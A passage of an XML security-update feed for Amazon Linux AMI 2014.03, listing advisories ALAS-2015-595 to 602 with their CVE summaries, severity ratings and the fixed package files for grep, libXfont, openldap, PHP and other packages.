release="0.30.rc1.39.amzn1" epoch="32" arch="i686"><filename>Packages/bind-9.8.2-0.30.rc1.39.amzn1.i686.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.30.rc1.39.amzn1" epoch="32" arch="i686"><filename>Packages/bind-libs-9.8.2-0.30.rc1.39.amzn1.i686.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.30.rc1.39.amzn1" epoch="32" 
arch="i686"><filename>Packages/bind-sdb-9.8.2-0.30.rc1.39.amzn1.i686.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.30.rc1.39.amzn1" epoch="32" arch="i686"><filename>Packages/bind-devel-9.8.2-0.30.rc1.39.amzn1.i686.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.30.rc1.39.amzn1" epoch="32" arch="i686"><filename>Packages/bind-debuginfo-9.8.2-0.30.rc1.39.amzn1.i686.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.30.rc1.39.amzn1" epoch="32" arch="i686"><filename>Packages/bind-chroot-9.8.2-0.30.rc1.39.amzn1.i686.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.30.rc1.39.amzn1" epoch="32" arch="i686"><filename>Packages/bind-utils-9.8.2-0.30.rc1.39.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-595</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-595: important priority package update for jakarta-taglibs-standard</title><issued date="2015-09-22 10:00:00" /><updated date="2015-09-22 10:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-0254:
It was found that the Java Standard Tag Library (JSTL) allowed the processing of untrusted XML documents to utilize external entity references, which could access resources on the host system and, potentially, allow arbitrary code execution.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0254" title="" id="CVE-2015-0254" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:1695.html" title="" id="RHSA-2015:1695" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="jakarta-taglibs-standard" version="1.1.1" release="11.7.9.amzn1" epoch="0" arch="noarch"><filename>Packages/jakarta-taglibs-standard-1.1.1-11.7.9.amzn1.noarch.rpm</filename></package><package name="jakarta-taglibs-standard-javadoc" version="1.1.1" release="11.7.9.amzn1" epoch="0" arch="noarch"><filename>Packages/jakarta-taglibs-standard-javadoc-1.1.1-11.7.9.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-596</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-596: medium priority package update for nss-softokn</title><issued date="2015-09-22 10:00:00" /><updated date="2015-09-22 10:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-2730:
A flaw was found in the way NSS verified certain ECDSA (Elliptic Curve Digital Signature Algorithm) signatures. Under certain conditions, an attacker could use this flaw to conduct signature forgery attacks.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2730" title="" id="CVE-2015-2730" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:1699.html" title="" id="RHSA-2015:1699" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nss-softokn-freebl" version="3.16.2.3" release="13.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-freebl-3.16.2.3-13.37.amzn1.x86_64.rpm</filename></package><package name="nss-softokn" version="3.16.2.3" release="13.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-3.16.2.3-13.37.amzn1.x86_64.rpm</filename></package><package name="nss-softokn-devel" version="3.16.2.3" release="13.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-devel-3.16.2.3-13.37.amzn1.x86_64.rpm</filename></package><package name="nss-softokn-freebl-devel" version="3.16.2.3" release="13.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-freebl-devel-3.16.2.3-13.37.amzn1.x86_64.rpm</filename></package><package name="nss-softokn-debuginfo" version="3.16.2.3" release="13.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-debuginfo-3.16.2.3-13.37.amzn1.x86_64.rpm</filename></package><package name="nss-softokn-debuginfo" version="3.16.2.3" release="13.37.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-debuginfo-3.16.2.3-13.37.amzn1.i686.rpm</filename></package><package name="nss-softokn-freebl-devel" version="3.16.2.3" release="13.37.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-freebl-devel-3.16.2.3-13.37.amzn1.i686.rpm</filename></package><package name="nss-softokn" version="3.16.2.3" release="13.37.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-3.16.2.3-13.37.amzn1.i686.rpm</filename></package><package name="nss-softokn-devel" version="3.16.2.3" release="13.37.amzn1" epoch="0" 
arch="i686"><filename>Packages/nss-softokn-devel-3.16.2.3-13.37.amzn1.i686.rpm</filename></package><package name="nss-softokn-freebl" version="3.16.2.3" release="13.37.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-freebl-3.16.2.3-13.37.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-597</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-597: important priority package update for libXfont</title><issued date="2015-09-22 10:00:00" /><updated date="2015-09-22 10:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-1804:
An integer truncation flaw was discovered in the way libXfont processed certain Glyph Bitmap Distribution Format (BDF) fonts. A malicious, local user could use this flaw to crash the X.Org server or, potentially, execute arbitrary code with the privileges of the X.Org server.
CVE-2015-1803:
A NULL pointer dereference flaw was discovered in the way libXfont processed certain Glyph Bitmap Distribution Format (BDF) fonts. A malicious, local user could use this flaw to crash the X.Org server.
CVE-2015-1802:
An integer overflow flaw was found in the way libXfont processed certain Glyph Bitmap Distribution Format (BDF) fonts. A malicious, local user could use this flaw to crash the X.Org server or, potentially, execute arbitrary code with the privileges of the X.Org server.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1802" title="" id="CVE-2015-1802" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1803" title="" id="CVE-2015-1803" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1804" title="" id="CVE-2015-1804" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:1708.html" title="" id="RHSA-2015:1708" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libXfont-devel" version="1.4.5" release="5.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXfont-devel-1.4.5-5.12.amzn1.x86_64.rpm</filename></package><package name="libXfont" version="1.4.5" release="5.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXfont-1.4.5-5.12.amzn1.x86_64.rpm</filename></package><package name="libXfont-debuginfo" version="1.4.5" release="5.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXfont-debuginfo-1.4.5-5.12.amzn1.x86_64.rpm</filename></package><package name="libXfont-debuginfo" version="1.4.5" release="5.12.amzn1" epoch="0" arch="i686"><filename>Packages/libXfont-debuginfo-1.4.5-5.12.amzn1.i686.rpm</filename></package><package name="libXfont-devel" version="1.4.5" release="5.12.amzn1" epoch="0" arch="i686"><filename>Packages/libXfont-devel-1.4.5-5.12.amzn1.i686.rpm</filename></package><package name="libXfont" version="1.4.5" release="5.12.amzn1" epoch="0" arch="i686"><filename>Packages/libXfont-1.4.5-5.12.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-598</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-598: low priority package update for grep</title><issued date="2015-09-22 10:00:00" /><updated date="2015-09-22 10:00:00" /><severity>low</severity><description>Package 
updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-1345:
A heap-based buffer overflow flaw was found in the way grep processed certain pattern and text combinations. An attacker able to trick a user into running grep on specially crafted input could use this flaw to crash grep or, potentially, read from uninitialized memory.
CVE-2012-5667:
An integer overflow flaw, leading to a heap-based buffer overflow, was found in the way grep parsed large lines of data. An attacker able to trick a user into running grep on a specially crafted data file could use this flaw to crash grep or, potentially, execute arbitrary code with the privileges of the user running grep.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5667" title="" id="CVE-2012-5667" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1345" title="" id="CVE-2015-1345" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:1447.html" title="" id="RHSA-2015:1447" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="grep-debuginfo" version="2.20" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/grep-debuginfo-2.20-1.14.amzn1.x86_64.rpm</filename></package><package name="grep" version="2.20" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/grep-2.20-1.14.amzn1.x86_64.rpm</filename></package><package name="grep" version="2.20" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/grep-2.20-1.14.amzn1.i686.rpm</filename></package><package name="grep-debuginfo" version="2.20" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/grep-debuginfo-2.20-1.14.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-599</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-599: important priority package update for openldap compat-openldap</title><issued date="2015-10-09 16:33:00" /><updated date="2015-10-09 17:06:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-6908:
A flaw was found in the way the OpenLDAP server daemon (slapd) parsed certain Basic Encoding Rules (BER) data. A remote attacker could use this flaw to crash slapd via a specially crafted packet.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6908" title="" id="CVE-2015-6908" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:1840.html" title="" id="RHSA-2015:1840" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openldap-debuginfo" version="2.4.23" release="34.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-debuginfo-2.4.23-34.25.amzn1.x86_64.rpm</filename></package><package name="openldap-servers-sql" version="2.4.23" release="34.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-servers-sql-2.4.23-34.25.amzn1.x86_64.rpm</filename></package><package name="openldap-devel" version="2.4.23" release="34.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-devel-2.4.23-34.25.amzn1.x86_64.rpm</filename></package><package name="openldap" version="2.4.23" release="34.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-2.4.23-34.25.amzn1.x86_64.rpm</filename></package><package name="openldap-clients" version="2.4.23" release="34.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-clients-2.4.23-34.25.amzn1.x86_64.rpm</filename></package><package name="openldap-servers" version="2.4.23" release="34.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/openldap-servers-2.4.23-34.25.amzn1.x86_64.rpm</filename></package><package name="openldap-devel" version="2.4.23" release="34.25.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-devel-2.4.23-34.25.amzn1.i686.rpm</filename></package><package name="openldap-servers-sql" version="2.4.23" release="34.25.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-servers-sql-2.4.23-34.25.amzn1.i686.rpm</filename></package><package name="openldap-servers" version="2.4.23" release="34.25.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-servers-2.4.23-34.25.amzn1.i686.rpm</filename></package><package 
name="openldap-clients" version="2.4.23" release="34.25.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-clients-2.4.23-34.25.amzn1.i686.rpm</filename></package><package name="openldap" version="2.4.23" release="34.25.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-2.4.23-34.25.amzn1.i686.rpm</filename></package><package name="openldap-debuginfo" version="2.4.23" release="34.25.amzn1" epoch="0" arch="i686"><filename>Packages/openldap-debuginfo-2.4.23-34.25.amzn1.i686.rpm</filename></package><package name="compat-openldap-debuginfo" version="2.3.43" release="2.5.amzn1" epoch="1" arch="x86_64"><filename>Packages/compat-openldap-debuginfo-2.3.43-2.5.amzn1.x86_64.rpm</filename></package><package name="compat-openldap" version="2.3.43" release="2.5.amzn1" epoch="1" arch="x86_64"><filename>Packages/compat-openldap-2.3.43-2.5.amzn1.x86_64.rpm</filename></package><package name="compat-openldap-debuginfo" version="2.3.43" release="2.5.amzn1" epoch="1" arch="i686"><filename>Packages/compat-openldap-debuginfo-2.3.43-2.5.amzn1.i686.rpm</filename></package><package name="compat-openldap" version="2.3.43" release="2.5.amzn1" epoch="1" arch="i686"><filename>Packages/compat-openldap-2.3.43-2.5.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-600</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-600: low priority package update for libunwind</title><issued date="2015-10-09 16:35:00" /><updated date="2015-10-09 16:40:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-3239:
An off-by-one array indexing error was found in the libunwind API, which could cause an error when reading untrusted binaries or DWARF debug info data. Red Hat products do not call the API in this way, and it is unlikely that any exploitable attack vector exists in current builds or supported usage.
1232265:
CVE-2015-3239 libunwind: off-by-one in dwarf_to_unw_regnum()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3239" title="" id="CVE-2015-3239" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libunwind" version="1.1" release="10.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libunwind-1.1-10.8.amzn1.x86_64.rpm</filename></package><package name="libunwind-debuginfo" version="1.1" release="10.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libunwind-debuginfo-1.1-10.8.amzn1.x86_64.rpm</filename></package><package name="libunwind-devel" version="1.1" release="10.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libunwind-devel-1.1-10.8.amzn1.x86_64.rpm</filename></package><package name="libunwind-devel" version="1.1" release="10.8.amzn1" epoch="0" arch="i686"><filename>Packages/libunwind-devel-1.1-10.8.amzn1.i686.rpm</filename></package><package name="libunwind" version="1.1" release="10.8.amzn1" epoch="0" arch="i686"><filename>Packages/libunwind-1.1-10.8.amzn1.i686.rpm</filename></package><package name="libunwind-debuginfo" version="1.1" release="10.8.amzn1" epoch="0" arch="i686"><filename>Packages/libunwind-debuginfo-1.1-10.8.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-601</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-601: medium priority package update for php56</title><issued date="2015-10-20 14:50:00" /><updated date="2016-03-16 16:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-7804:
1271088:
CVE-2015-7804 php: uninitialized pointer in phar_make_dirstream()
CVE-2015-7803:
1271081:
CVE-2015-7803 php: NULL pointer dereference in phar_get_fp_offset()
CVE-2015-6838:
A NULL pointer dereference flaw was found in the XSLTProcessor class in PHP. An attacker could use this flaw to cause a PHP application to crash if it performed Extensible Stylesheet Language (XSL) transformations using untrusted XSLT files and allowed PHP functions to be used as XSLT functions within XSL stylesheets.
1260711:
CVE-2015-6837 CVE-2015-6838 php: NULL pointer dereference in XSLTProcessor class
CVE-2015-6837:
A NULL pointer dereference flaw was found in the XSLTProcessor class in PHP. An attacker could use this flaw to cause a PHP application to crash if it performed Extensible Stylesheet Language (XSL) transformations using untrusted XSLT files and allowed PHP functions to be used as XSLT functions within XSL stylesheets.
1260711:
CVE-2015-6837 CVE-2015-6838 php: NULL pointer dereference in XSLTProcessor class
CVE-2015-6836:
A flaw was discovered in the way PHP performed object unserialization. Specially crafted input processed by the unserialize() function could cause a PHP application to crash or, possibly, execute arbitrary code.
1260683:
CVE-2015-6836 php: SOAP serialize_function_call() type confusion
CVE-2015-6835:
1260647:
CVE-2015-6835 php: use-after-free vulnerability in session deserializer
CVE-2015-6834:
1260642:
CVE-2015-6834 php: multiple unserialization use-after-free issues
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6834" title="" id="CVE-2015-6834" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6835" title="" id="CVE-2015-6835" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6836" title="" id="CVE-2015-6836" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6837" title="" id="CVE-2015-6837" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6838" title="" id="CVE-2015-6838" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7803" title="" id="CVE-2015-7803" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7804" title="" id="CVE-2015-7804" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php56-intl" version="5.6.14" release="1.119.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-intl-5.6.14-1.119.amzn1.x86_64.rpm</filename></package><package name="php56-process" version="5.6.14" release="1.119.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-process-5.6.14-1.119.amzn1.x86_64.rpm</filename></package><package name="php56-xml" version="5.6.14" release="1.119.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xml-5.6.14-1.119.amzn1.x86_64.rpm</filename></package><package name="php56-common" version="5.6.14" release="1.119.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-common-5.6.14-1.119.amzn1.x86_64.rpm</filename></package><package name="php56-xmlrpc" version="5.6.14" release="1.119.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xmlrpc-5.6.14-1.119.amzn1.x86_64.rpm</filename></package><package name="php56-recode" version="5.6.14" release="1.119.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-recode-5.6.14-1.119.amzn1.x86_64.rpm</filename></package><package 
name="php56-snmp" version="5.6.14" release="1.119.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-snmp-5.6.14-1.119.amzn1.x86_64.rpm</filename></package><package name="php56-ldap" version="5.6.14" release="1.119.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-ldap-5.6.14-1.119.amzn1.x86_64.rpm</filename></package><package name="php56-debuginfo" version="5.6.14" release="1.119.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-debuginfo-5.6.14-1.119.amzn1.x86_64.rpm</filename></package><package name="php56-mssql" version="5.6.14" release="1.119.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mssql-5.6.14-1.119.amzn1.x86_64.rpm</filename></package><package name="php56-mysqlnd" version="5.6.14" release="1.119.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mysqlnd-5.6.14-1.119.amzn1.x86_64.rpm</filename></package><package name="php56-soap" version="5.6.14" release="1.119.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-soap-5.6.14-1.119.amzn1.x86_64.rpm</filename></package><package name="php56-mcrypt" version="5.6.14" release="1.119.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mcrypt-5.6.14-1.119.amzn1.x86_64.rpm</filename></package><package name="php56-enchant" version="5.6.14" release="1.119.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-enchant-5.6.14-1.119.amzn1.x86_64.rpm</filename></package><package name="php56-devel" version="5.6.14" release="1.119.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-devel-5.6.14-1.119.amzn1.x86_64.rpm</filename></package><package name="php56-pgsql" version="5.6.14" release="1.119.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pgsql-5.6.14-1.119.amzn1.x86_64.rpm</filename></package><package name="php56-dbg" version="5.6.14" release="1.119.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dbg-5.6.14-1.119.amzn1.x86_64.rpm</filename></package><package name="php56" version="5.6.14" release="1.119.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php56-5.6.14-1.119.amzn1.x86_64.rpm</filename></package><package name="php56-opcache" version="5.6.14" release="1.119.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-opcache-5.6.14-1.119.amzn1.x86_64.rpm</filename></package><package name="php56-cli" version="5.6.14" release="1.119.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-cli-5.6.14-1.119.amzn1.x86_64.rpm</filename></package><package name="php56-embedded" version="5.6.14" release="1.119.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-embedded-5.6.14-1.119.amzn1.x86_64.rpm</filename></package><package name="php56-tidy" version="5.6.14" release="1.119.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-tidy-5.6.14-1.119.amzn1.x86_64.rpm</filename></package><package name="php56-mbstring" version="5.6.14" release="1.119.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mbstring-5.6.14-1.119.amzn1.x86_64.rpm</filename></package><package name="php56-gd" version="5.6.14" release="1.119.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gd-5.6.14-1.119.amzn1.x86_64.rpm</filename></package><package name="php56-bcmath" version="5.6.14" release="1.119.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-bcmath-5.6.14-1.119.amzn1.x86_64.rpm</filename></package><package name="php56-pdo" version="5.6.14" release="1.119.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pdo-5.6.14-1.119.amzn1.x86_64.rpm</filename></package><package name="php56-gmp" version="5.6.14" release="1.119.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gmp-5.6.14-1.119.amzn1.x86_64.rpm</filename></package><package name="php56-imap" version="5.6.14" release="1.119.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-imap-5.6.14-1.119.amzn1.x86_64.rpm</filename></package><package name="php56-fpm" version="5.6.14" release="1.119.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-fpm-5.6.14-1.119.amzn1.x86_64.rpm</filename></package><package name="php56-odbc" 
version="5.6.14" release="1.119.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-odbc-5.6.14-1.119.amzn1.x86_64.rpm</filename></package><package name="php56-pspell" version="5.6.14" release="1.119.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pspell-5.6.14-1.119.amzn1.x86_64.rpm</filename></package><package name="php56-dba" version="5.6.14" release="1.119.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dba-5.6.14-1.119.amzn1.x86_64.rpm</filename></package><package name="php56-xmlrpc" version="5.6.14" release="1.119.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xmlrpc-5.6.14-1.119.amzn1.i686.rpm</filename></package><package name="php56-xml" version="5.6.14" release="1.119.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xml-5.6.14-1.119.amzn1.i686.rpm</filename></package><package name="php56-odbc" version="5.6.14" release="1.119.amzn1" epoch="0" arch="i686"><filename>Packages/php56-odbc-5.6.14-1.119.amzn1.i686.rpm</filename></package><package name="php56-imap" version="5.6.14" release="1.119.amzn1" epoch="0" arch="i686"><filename>Packages/php56-imap-5.6.14-1.119.amzn1.i686.rpm</filename></package><package name="php56-pdo" version="5.6.14" release="1.119.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pdo-5.6.14-1.119.amzn1.i686.rpm</filename></package><package name="php56-debuginfo" version="5.6.14" release="1.119.amzn1" epoch="0" arch="i686"><filename>Packages/php56-debuginfo-5.6.14-1.119.amzn1.i686.rpm</filename></package><package name="php56-gmp" version="5.6.14" release="1.119.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gmp-5.6.14-1.119.amzn1.i686.rpm</filename></package><package name="php56-mcrypt" version="5.6.14" release="1.119.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mcrypt-5.6.14-1.119.amzn1.i686.rpm</filename></package><package name="php56-dba" version="5.6.14" release="1.119.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dba-5.6.14-1.119.amzn1.i686.rpm</filename></package><package 
name="php56-tidy" version="5.6.14" release="1.119.amzn1" epoch="0" arch="i686"><filename>Packages/php56-tidy-5.6.14-1.119.amzn1.i686.rpm</filename></package><package name="php56-enchant" version="5.6.14" release="1.119.amzn1" epoch="0" arch="i686"><filename>Packages/php56-enchant-5.6.14-1.119.amzn1.i686.rpm</filename></package><package name="php56-opcache" version="5.6.14" release="1.119.amzn1" epoch="0" arch="i686"><filename>Packages/php56-opcache-5.6.14-1.119.amzn1.i686.rpm</filename></package><package name="php56-common" version="5.6.14" release="1.119.amzn1" epoch="0" arch="i686"><filename>Packages/php56-common-5.6.14-1.119.amzn1.i686.rpm</filename></package><package name="php56-devel" version="5.6.14" release="1.119.amzn1" epoch="0" arch="i686"><filename>Packages/php56-devel-5.6.14-1.119.amzn1.i686.rpm</filename></package><package name="php56-fpm" version="5.6.14" release="1.119.amzn1" epoch="0" arch="i686"><filename>Packages/php56-fpm-5.6.14-1.119.amzn1.i686.rpm</filename></package><package name="php56-mssql" version="5.6.14" release="1.119.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mssql-5.6.14-1.119.amzn1.i686.rpm</filename></package><package name="php56-pspell" version="5.6.14" release="1.119.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pspell-5.6.14-1.119.amzn1.i686.rpm</filename></package><package name="php56-snmp" version="5.6.14" release="1.119.amzn1" epoch="0" arch="i686"><filename>Packages/php56-snmp-5.6.14-1.119.amzn1.i686.rpm</filename></package><package name="php56-process" version="5.6.14" release="1.119.amzn1" epoch="0" arch="i686"><filename>Packages/php56-process-5.6.14-1.119.amzn1.i686.rpm</filename></package><package name="php56-cli" version="5.6.14" release="1.119.amzn1" epoch="0" arch="i686"><filename>Packages/php56-cli-5.6.14-1.119.amzn1.i686.rpm</filename></package><package name="php56-mysqlnd" version="5.6.14" release="1.119.amzn1" epoch="0" 
arch="i686"><filename>Packages/php56-mysqlnd-5.6.14-1.119.amzn1.i686.rpm</filename></package><package name="php56-ldap" version="5.6.14" release="1.119.amzn1" epoch="0" arch="i686"><filename>Packages/php56-ldap-5.6.14-1.119.amzn1.i686.rpm</filename></package><package name="php56-gd" version="5.6.14" release="1.119.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gd-5.6.14-1.119.amzn1.i686.rpm</filename></package><package name="php56-intl" version="5.6.14" release="1.119.amzn1" epoch="0" arch="i686"><filename>Packages/php56-intl-5.6.14-1.119.amzn1.i686.rpm</filename></package><package name="php56-embedded" version="5.6.14" release="1.119.amzn1" epoch="0" arch="i686"><filename>Packages/php56-embedded-5.6.14-1.119.amzn1.i686.rpm</filename></package><package name="php56-dbg" version="5.6.14" release="1.119.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dbg-5.6.14-1.119.amzn1.i686.rpm</filename></package><package name="php56" version="5.6.14" release="1.119.amzn1" epoch="0" arch="i686"><filename>Packages/php56-5.6.14-1.119.amzn1.i686.rpm</filename></package><package name="php56-bcmath" version="5.6.14" release="1.119.amzn1" epoch="0" arch="i686"><filename>Packages/php56-bcmath-5.6.14-1.119.amzn1.i686.rpm</filename></package><package name="php56-soap" version="5.6.14" release="1.119.amzn1" epoch="0" arch="i686"><filename>Packages/php56-soap-5.6.14-1.119.amzn1.i686.rpm</filename></package><package name="php56-pgsql" version="5.6.14" release="1.119.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pgsql-5.6.14-1.119.amzn1.i686.rpm</filename></package><package name="php56-recode" version="5.6.14" release="1.119.amzn1" epoch="0" arch="i686"><filename>Packages/php56-recode-5.6.14-1.119.amzn1.i686.rpm</filename></package><package name="php56-mbstring" version="5.6.14" release="1.119.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mbstring-5.6.14-1.119.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" 
author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-602</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-602: medium priority package update for php55</title><issued date="2015-10-20 14:52:00" /><updated date="2016-03-16 16:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-7804:
1271088:
CVE-2015-7804 php: uninitialized pointer in phar_make_dirstream()
CVE-2015-7803:
1271081:
CVE-2015-7803 php: NULL pointer dereference in phar_get_fp_offset()
CVE-2015-6838:
A NULL pointer dereference flaw was found in the XSLTProcessor class in PHP. An attacker could use this flaw to cause a PHP application to crash if it performed Extensible Stylesheet Language (XSL) transformations using untrusted XSLT files and allowed PHP functions to be used as XSLT functions within XSL stylesheets.
1260711:
CVE-2015-6837 CVE-2015-6838 php: NULL pointer dereference in XSLTProcessor class
CVE-2015-6837:
